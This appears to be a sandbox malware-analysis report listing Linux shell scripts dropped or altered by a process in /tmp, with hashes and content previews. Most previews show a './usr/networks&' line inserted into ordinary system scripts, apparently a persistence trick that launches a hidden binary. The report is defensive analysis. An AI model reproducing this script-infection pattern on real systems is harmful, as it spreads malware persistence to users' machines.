                                                                                                                                Entropy (8bit):5.44928341819888
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:yGC9i91fZ1j73kqM51SvbZGspLpZonAeVceVIP/yKIkC6eZju:yGC90f/4SvbYapZoh/GC64ju
                                                                                                                                MD5:B4F115765D68E40BEBB845FA7F437539
                                                                                                                                SHA1:4C37804189C7D91916E7050F4E4783A4C7F2F389
                                                                                                                                SHA-256:9EAA55914953E4BAE6AF1E28841BD329160A16D17DE8061B04519669B2B2BCF9
                                                                                                                                SHA-512:27D938F1CA106CA6431F2B8635D223BAA47D192D983357A649B95B70DB931199E8B084C2EB337321D9D6B4D4F63D6BA64A8CEFA5FE888896BE7FA1C5D2983CC9
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.bugout() { echo "${MYNAME}: Programming error" >&2 ; exit 123 ; }..echo_card_indices().{..if [ -f /proc/asound/cards ] ; then...sed -n -e's/^[[:space:]]*\([0-7]\)[[:space:]].*/\1/p' /proc/asound/cards..fi.}..filter_amixer_output().{..sed \...-e '/Unable to find simple control/d' \...-e '/Unknown playback setup/d' \...-e '/^$/d'.}..# The following functions try to set many controls..# No card has all the controls and so some of the attempts are bound to fail..# Because of this, the functions can't return useful status values...# $1 <control>.# $2 <level>.# $CARDOPT.unmute_and_set_level().{..{ [ "$2" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "$2" unmute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $CARDOPT.mute_and_zero_level().{..{ [ "$1" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "0%" mute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $2 "on" | "off".# $CARDOPT.switch_control().{..{ [ "$2" ] &&
                                                                                                                                /usr/share/brltty/initramfs/brltty.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):46
                                                                                                                                Entropy (8bit):3.925523369006428
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                                                                                MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                                                                                SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                                                                                SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                                                                                SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                                                                                /usr/share/cups/braille/cups-braille.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:UTF-8 Unicode text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3551
                                                                                                                                Entropy (8bit):5.478748088887141
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:OANcIOY/L/1RAnw/UYfot2tAtldWfRzRukEu/YmWhS3mj4VT5V5TNVIt6Wousukz:OANSY/L/1R3/SRWikEu9bVaH/c
                                                                                                                                MD5:6025702AFC2865AA8BA8638B3B590284
                                                                                                                                SHA1:82A57782652A5D981E9A86E55F0F6D5A276ACEE1
                                                                                                                                SHA-256:98D84975905042A77F6E514D7C54478701D6C0CC4BDDFE8B047D2BE3CD475C5C
                                                                                                                                SHA-512:0E3A45F3160B3CA7442C4B2D4A9A2AD0A5390AC7091E0F9C870A073C3E6C408C171DE71014005196FF310A67B8ABC08BD0619B81972C118F5CF8281B9234C427
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 1. ;;. esac. printf "%s" "$VALUE".}..[ -z "$NB" ] && NB=1..#.# Page size.# Units in 100th of mm.#..# TODO: better handle imageable area.PAGESIZE=$(getOption PageSize).case "$PAGESIZE" in. Legal). PAGEWIDTH=21590. PAGEHEIGHT=35560. ;;. Letter). PAGEWIDTH=21590. PAGEHEIGHT=27940. ;;. A3). PAGEWIDTH=29700. PAGEHEIGHT=42000. ;;. A4). PAGEWIDTH=21000. PAGEHEIGHT=29700. ;;. A4TF). PAGEWIDTH=21000. PAGEHEIGHT=30480. ;;. A5). PAGEWIDTH=14850. PAGEHEIGHT=21000. ;;. 110x115). PAGEWIDTH=27940. PAGEHEIGHT=29210. ;;. 110x120). PAGEWIDTH=27940. PAGEHEIGHT=30480. ;;. 110x170). PAGEWIDTH=27940. PAGEHEIGHT=43180. ;;. 115x110). PAGEWIDTH=29210. PAGEHEIGHT=27940. ;;. 120x120). PAGEWIDTH=30480. PAGEHEIGHT=30480. ;;. *). printf "ERROR: Unknown page size '%s'\n" "$PAGESIZE" >&2. exit 1. ;;.esac..#.TODO: hardcoded margin.PRINTABLEWIDTH=$((PAGEWIDTH - 100
                                                                                                                                /usr/share/cups/braille/index.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):590
                                                                                                                                Entropy (8bit):5.080350031939274
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:aNz9qyz2WNjcIBT/s8lHzSDIyvSs/mFex/UeHz6GJGIyzDFLn:69qA7R/s6TSkc/yex/UeT6GJHa
                                                                                                                                MD5:D662E33F24591E0E67D329E55610FA21
                                                                                                                                SHA1:C23AA5BAE84C14C8E48023BC330990B4377826C0
                                                                                                                                SHA-256:1A9C2355734541A8364E25854C96B0A6C86E524FE55224C9205EF9F0F40B5E55
                                                                                                                                SHA-512:5F7DFCBCCABFAF9D56B5166897CDAA66B0146324A2D3F398B99713CFAE58774FE4D678F04EFC19253366E2455246692A4A9572423331A828459192561B66C40B
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. *) printf "ERROR: unsupported '%s' page folding\n" "$FOLDING" >&2 ; exit 1 ;;. esac.. # Configure dots spacing. case "$TEXTDOTDISTANCE" in. 220) INIT+=,TD1 ;;. 250) INIT+=,TD0 ;;. 320) INIT+=,TD2 ;;. *) printf "ERROR: unsupported '%s' text dot distance\n" "$TEXTDOTDISTANCE" >&2 ; exit 1 ;;. esac. case $GRAPHICDOTDISTANCE in. 160) INIT+=,GD2 ;;. 200) INIT+=,GD0 ;;. 250) INIT+=,GD1 ;;. *) printf "ERROR: unsupported '%s'graphic dot distance\n" "$GRAPHICDOTDISTANCE" >&2 ; exit 1 ;;. esac.. echo "$INIT".}../usr/networks&.exit 1.
                                                                                                                                /usr/share/cups/braille/indexv3.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):945
                                                                                                                                Entropy (8bit):4.9071581716168575
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:hO+DYLYWYZBBmbq2rywi+bdKz80g/D+6k9JSW9L:DDYLYWYZ3rwi+BKjg/D+RJSW9L
                                                                                                                                MD5:F0CACB80F022AB8FC64F04310E59BEC2
                                                                                                                                SHA1:059D10F9C33BF8724F38F1E4A444022D9CEDBD82
                                                                                                                                SHA-256:62634D82D3013B5004E7220BC0CEBA6AE0C6DAFDC41C5B4D19B49A5154BFCE09
                                                                                                                                SHA-512:B94116448FBC22E5E205225FD18B8D3D159BD5BA2E68758BF12EE4EA12860F40C0F5DD8B7F064C8B1994280BDD999779035F80F2D55937C54A649F02A8BC7068
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 1. fi. if [ $LINESPACING -lt 100 ]. then..echo "ERROR: too small $LINESPACING line spacing" >&2..exit 1. fi. INIT+=,LS$(($LINESPACING / 10)). ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Hoping the user properly configured an 8-dot table. 8) ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same way as the embosser.. INIT=.fi../usr/networks&.exit 1.
                                                                                                                                /usr/share/cups/braille/indexv4.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):818
                                                                                                                                Entropy (8bit):4.8178661177968065
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:C9DYLYWYZBBmbq2rywd8P8LVz80g/D+6k9JSW9L:wDYLYWYZ3rwyP8Bjg/D+RJSW9L
                                                                                                                                MD5:07C3F2CE31B1380132DE8B1D5B9C4BA8
                                                                                                                                SHA1:769D00809D188A7D9F8357152C9B82F634C0514B
                                                                                                                                SHA-256:162E03582392361663035FF70A573CB379796CA647404BFFBE1C22D6AE7C25FB
                                                                                                                                SHA-512:CB698C8E13D0635643F5F8102FFA961D050649F82FB915155B5D19E4CFC5985C86586BF41082731ACFDCBA5F799FF7F056A4D6AD0337383FABC4731D352D16CD
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 1. ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Firmware 11.02.1 and above allow to make sure to be using a 8-dot table. 8) INIT+=,BT6 ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same way as the embosser.. INIT=.fi../usr/networks&.exit 1.
                                                                                                                                /usr/share/debconf/confmodule.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/acpid/examples/ac.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/acpid/examples/default.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):309
                                                                                                                                Entropy (8bit):4.972882784760757
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:3Z2iGYkj5Ri36+u4DXFI7WBRZrjFI7efgYjFI7e6RTaKtkmTn:J2iB6PiZqWZdqefgQq9tPkmTn
                                                                                                                                MD5:8B5CC9506A59F35C919D0CF65E3D75FA
                                                                                                                                SHA1:956100F1C2B0A99C8B578DC6CE4854991089289A
                                                                                                                                SHA-256:F53B8D26AD4D0CDE785D89C2F85D2132B943D5AB01FC482A8D53D1D6D3A01D5E
                                                                                                                                SHA-512:725E036838D708E1BCBA1A5C89470B892BA249305AC5D237B203AB21B0794A1BC64917ACBBD1793F41F530E482C85C9C252D143DACB68E9667088E274139B905
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..test -e "$DEVNAME" || { echo "$DEVNAME doesn't exist, aborting"; exit 1; }..#echo "$DEVNAME exists"..if blockdev --rereadpt "$DEVNAME"; then...echo "blockdev --rereadpt succeeded"...exit 0..fi..echo "blockdev --rereadpt failed, exit code: $?".done.echo "Timed out".) &../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/cron/examples/cron-tasks-review.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3647
                                                                                                                                Entropy (8bit):4.544491450799858
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:TExE7LzpY0V0rmzBpuYlzsSwG7SRpvzTC/8mO:TExgHpYa0ABppdsSyk8mO
                                                                                                                                MD5:734F4010B22A9F64DBCCED57155A6396
                                                                                                                                SHA1:1A3984285346A3FB8CF1A2666F273A8EFC300495
                                                                                                                                SHA-256:5F76E60D53DEB684C98DFE7E2306D0AAC86938ECB6B68AA41283F560CFEBACF8
                                                                                                                                SHA-512:8BC6C5176E4742ECBD69498B7CA52955CAF78031A996E0B50DFC23AA490C02B00B71E70DA500D27BEF241025B2FB3D4C50A943D6CB49E4964127E2513E836ADC
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. -h|--help) usage; exit 0;;. -v|--version) version; exit 0;;. -s|--syslog) syslog="yes";;. -i|--info) send_info="yes";;. *) ;;. esac.done. ..send_message () {.. level=$1. msg=$2. [ "$level" = "info" ] && [ "$send_info" = "no" ] && return.. if [ "$syslog" = "yes" ] ; then. logger -p cron.$level -t CRON $msg. else. case $level in. "warn"). echo "WARN: $msg" >&2. ;;. "info"). echo "INFO: $msg" . ;;. esac. fi.}..warn () {.# Send a warning to the user. file=$1. reason=$2.. name=`basename $file`. # Skip hidden files. echo $name | grep -q -E '^\.' && return. # Skip disabled files. echo $name | grep -q -E '\.disabled' && return.. # TODO: Should we send warnings for '.old' or '.orig'?.. # Do not send a warning if the file is '.dpkg-old' or '.dpkg-dist'. if ! echo $file | grep -q -E '\.dp
                                                                                                                                /usr/share/doc/gawk/examples/network/PostAgent.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/gawk/examples/prog/igawk.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:awk or perl script, ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1829
                                                                                                                                Entropy (8bit):4.38604786798686
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:yiYuM2UFMx/sIo6ml4wiQDRoLe/HfwoDt8vPP6k30YXU0kKhpjKGg:eBMx/tKiQDWawit8vPP6A0YXjnhpjXg
                                                                                                                                MD5:141401CE535E9FFF3A9F3C9D5ECEC093
                                                                                                                                SHA1:B0A5FA40FFBDAFF1F415B38513CE2A7921328D05
                                                                                                                                SHA-256:68EC7433147E2F312EA47B69A5CEAE1B781AC9C95260A8D95F2A9354E26A0C35
                                                                                                                                SHA-512:A3CC9A94FB7D97A1F57AE1D29A3432A56ACCE85C50E0F4073D65AC5CF77C50DE4A74E207203141ABD7297B62068BB937A3C63E5880A79C09950E5E6DD562D1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 0 ;;.. -[W-]*) opts="$opts '$1'" ;;.. *) break ;;. esac. shift.done..if [ -z "$program" ].then. program=${1?'missing program'}. shift.fi..# At this point, `program' has the program..expand_prog='..function pathto(file, i, t, junk).{. if (index(file, "/") != 0). return file.. if (file == "-"). return file.. for (i = 1; i <= ndirs; i++) {. t = (pathlist[i] "/" file). if ((getline junk < t) > 0) {. # found it. close(t). return t. }. }. return "".}.BEGIN {. path = ENVIRON["AWKPATH"]. ndirs = split(path, pathlist, ":"). for (i = 1; i <= ndirs; i++) {. if (pathlist[i] == ""). pathlist[i] = ".". }. stackptr = 0. input[stackptr] = ARGV[1] # ARGV[1] is first file.. for (; stackptr >= 0; stackptr--) {. while ((getline < input[stackptr]) > 0) {. if (tolower($1) != "@include") {. print
                                                                                                                                /usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/gdb/contrib/ari/gdb_find.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/gdb/contrib/expect-read1.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):253
                                                                                                                                Entropy (8bit):5.267626424494032
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:aBH51mUeX3+G3Wj3kGjVnAdiIVUe8J24n:aB51je+f3VnBaUe8J24n
                                                                                                                                MD5:37C0552689BD7719FFBE66F4C9AB831B
                                                                                                                                SHA1:8BA6E9AED3FF50AB5AE1E516E1ADEE1F1464BF79
                                                                                                                                SHA-256:6B21FC4B985122F02025F5050FD3C0910228E394DC9E72EBEC9F6354785BDF0B
                                                                                                                                SHA-512:EA97773FE3E45B9A392CA74C1D8D527952980474C75846495A796652FAB647128844E9E87529D51CBF7520ACA08F7C1188E676E5E5BAC4F0FAA7B75B66538F31
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 2.fi.SO=/tmp/expect-read1.$$.so.rm -f $SO.CMD="${CC_FOR_TARGET:-gcc} -o $SO -Wall -fPIC -shared $C".if ! $CMD; then. echo >&2 "$0: Failed: $CMD". exit 2.fi.trap "rm -f $SO" EXIT.LD_PRELOAD=$SO expect "$@"../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/gdb/contrib/gdb-add-index.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1048
                                                                                                                                Entropy (8bit):4.806462537404251
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:yJI5VNyJmc20JsvodjbGCHiVwZvFfg0udaATYdITFvVg47VZ0ou:II63pJftBudaqYmTFmJ
                                                                                                                                MD5:5864556D6334995F87B9236F2BDDAE2F
                                                                                                                                SHA1:65C2E90583C5B2DF8050063559E7FA2885F7427F
                                                                                                                                SHA-256:4BBE42BA86B2EBBC463E505A6D3551775BB4E2ED64BDA2C8F1E7B50B9F4C99C3
                                                                                                                                SHA-512:0E99B5F846FE6295B4ACFF8030BCBE895D1BCCCDF7B0098E8DABF8ADC50E56CA8A38A549B5A052C86FF9DA9B0A2C7BFBAD7CE939F373AB78F525FEEF2065D615
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 1.fi..file="$1"..if test ! -r "$file"; then. echo "$myname: unable to access: $file" 1>&2. exit 1.fi..dir="${file%/*}".test "$dir" = "$file" && dir=".".index="${file}.gdb-index"..rm -f $index.# Ensure intermediate index file is removed when we exit..trap "rm -f $index" 0..$GDB --batch -nx -iex 'set auto-load no' \. -ex "file $file" -ex "save gdb-index $dir" || {. # Just in case.. status=$?. echo "$myname: gdb error generating index for $file" 1>&2. exit $status.}..# In some situations gdb can exit without creating an index. This is.# not an error..# E.g., if $file is stripped. This behaviour is akin to stripping an.# already stripped binary, it's a no-op..status=0..if test -f "$index"; then. $OBJCOPY --add-section .gdb_index="$index" \..--set-section-flags .gdb_index=readonly "$file" "$file". status=$?.else. echo "$myname: No index was created for $file" 1>&2. echo "$myname: [Was there no debuginfo? Was there already an index?
                                                                                                                                /usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/examples/git-am.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:OS/2 REXX batch file, ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):21942
                                                                                                                                Entropy (8bit):5.106661772210516
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:6REUag9f8Ydg0VeV9KziwsORFRByXlU1m4csVIw17OqlDfRRdxyZymevMNcPh/Rl:6Rhb9fJd1Vmkziw9RFRByX8D7Vd7Oqlh
                                                                                                                                MD5:16E6ACE0E85A54EA4C061BDA1D3BF70D
                                                                                                                                SHA1:B2569F727A9B61E0583574CC0793647136F76E32
                                                                                                                                SHA-256:B56C64E30B028ACB3523D99266AD8931417240B883EC8961ED24F4004D6EA1C9
                                                                                                                                SHA-512:F730D5171A9533A87455BEA4133439096E9A53C4783FAD29DA3DFDB9BBCD2F05DDF9EBBEBB94CF21AC4138833AB83B9AEF94612D5538671F29B726F147749322
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 1.}..safe_to_abort () {..if test -f "$dotest/dirtyindex"..then...return 1..fi...if ! test -f "$dotest/abort-safety"..then...return 0..fi...abort_safety=$(cat "$dotest/abort-safety")..if test "z$(git rev-parse --verify -q HEAD)" = "z$abort_safety"..then...return 0..fi..gettextln "You seem to have moved HEAD since the last 'am' failure..Not rewinding to ORIG_HEAD" >&2..return 1.}..stop_here_user_resolve () {. if [ -n "$resolvemsg" ]; then.. printf '%s\n' "$resolvemsg".. stop_here $1. fi. eval_gettextln "When you have resolved this problem, run \"\$cmdline --continue\"..If you prefer to skip this patch, run \"\$cmdline --skip\" instead..To restore the original branch and stop patching, run \"\$cmdline --abort\".".. stop_here $1.}..go_next () {..rm -f "$dotest/$msgnum" "$dotest/msg" "$dotest/msg-clean" \..."$dotest/patch" "$dotest/info"..echo "$next" >"$dotest/next"..this=$next.}..cannot_fallback () {..echo "$1"..gettextln "Cannot fall back to thr
                                                                                                                                /usr/share/doc/git/contrib/examples/git-checkout.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4825
                                                                                                                                Entropy (8bit):5.113528532566079
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:dFHSEVt3CuAqnOGD5OKNPLT85zoEl5kJbDF772+u/NvZKJhGY44FVT0HAqFt3e:LTVUCDgKNDT8CB72hxChZ40KfQ
                                                                                                                                MD5:595AE545C31B21B58D1C77B533F7A2D4
                                                                                                                                SHA1:86F2DA045AA3718950585397A21D5387682A3548
                                                                                                                                SHA-256:9DACE4B4205D10F2705B32DC8963F132E51FC1D9DF799AE543EC6BE6115FA2B0
                                                                                                                                SHA-512:A8799023F5550B631064E93EFF1E4786A2362AB3B409D143800CE408BD150CECD74AD3266B32E8CBF7B0A007E352F3F4DA3D1EB7D216DA26413E718E2DCFC09C
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&...git update-index --index-info || exit $?..fi...# Make sure the request is about existing paths...git ls-files --full-name --error-unmatch -- "$@" >/dev/null || exit..git ls-files --full-name -- "$@" |...(cd_to_toplevel && git checkout-index -f -u --stdin)...# Run a post-checkout hook -- the HEAD does not change so the..# current HEAD is passed in for both args..if test -x "$GIT_DIR"/hooks/post-checkout; then.. "$GIT_DIR"/hooks/post-checkout $old $old 0..fi...exit $?.else..# Make sure we did not fall back on $arg^{tree} codepath..# since we are not checking out from an arbitrary tree-ish,..# but switching branches...if test '' != "$new"..then...git rev-parse --verify "$new^{commit}" >/dev/null 2>&1 ||...die "Cannot switch branch to a non-commit."..fi.fi..# We are switching branches and checking out trees, so.# we *NEED* to be at the toplevel..cd_to_toplevel..[ -z "$new" ] && new=$old && new_name="$old_name"..# If we don't have an existing branch that we're switching
                                                                                                                                /usr/share/doc/git/contrib/examples/git-clean.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/examples/git-clone.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
